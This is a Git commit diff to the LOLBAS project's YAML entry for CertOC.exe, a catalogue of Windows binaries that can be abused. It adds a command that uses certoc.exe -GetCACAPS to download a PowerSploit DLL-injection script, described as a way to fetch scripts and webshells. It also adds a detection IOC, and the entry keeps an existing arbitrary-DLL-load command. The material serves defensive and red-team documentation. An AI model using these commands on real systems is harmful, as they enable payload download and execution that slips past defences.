mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-25 06:18:50 +01:00
Update Certoc.yml (#168)
Co-authored-by: Wietze <wietze@users.noreply.github.com>
This commit is contained in:
parent
5db35bb397
commit
97f5042a58
@ -2,7 +2,7 @@
|
||||
Name: CertOC.exe
|
||||
Description: Used for installing certificates
|
||||
Author: 'Ensar Samil'
|
||||
Created: '2021-10-07'
|
||||
Created: 2021-10-07
|
||||
Commands:
|
||||
- Command: certoc.exe -LoadDLL "C:\test\calc.dll"
|
||||
Description: Loads the target DLL file
|
||||
@ -10,8 +10,16 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows Server 2022
|
||||
MitreLink: https://attack.mitre.org/techniques/T1218/
|
||||
OperatingSystem: Windows Server 2022
|
||||
- Command: certoc.exe -GetCACAPS https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-DllInjection.ps1
|
||||
Description: Downloads text formatted files
|
||||
Usecase: Download scripts, webshells etc.
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
MitreLink: https://attack.mitre.org/techniques/T1105/
|
||||
OperatingSystem: Windows Server 2022
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\certoc.exe
|
||||
- Path: c:\windows\syswow64\certoc.exe
|
||||
@ -20,8 +28,10 @@ Code_Sample:
|
||||
Detection:
|
||||
- IOC: Process creation with given parameter
|
||||
- IOC: Unsigned DLL load via certoc.exe
|
||||
- IOC: Network connection via certoc.exe
|
||||
Resources:
|
||||
- Link: https://twitter.com/sblmsrsn/status/1445758411803480072?s=20
|
||||
- Link: https://twitter.com/sblmsrsn/status/1452941226198671363?s=20
|
||||
Acknowledgement:
|
||||
- Person: Ensar Samil
|
||||
Handle: '@sblmsrsn'
|
||||
|
Loading…
Reference in New Issue
Block a user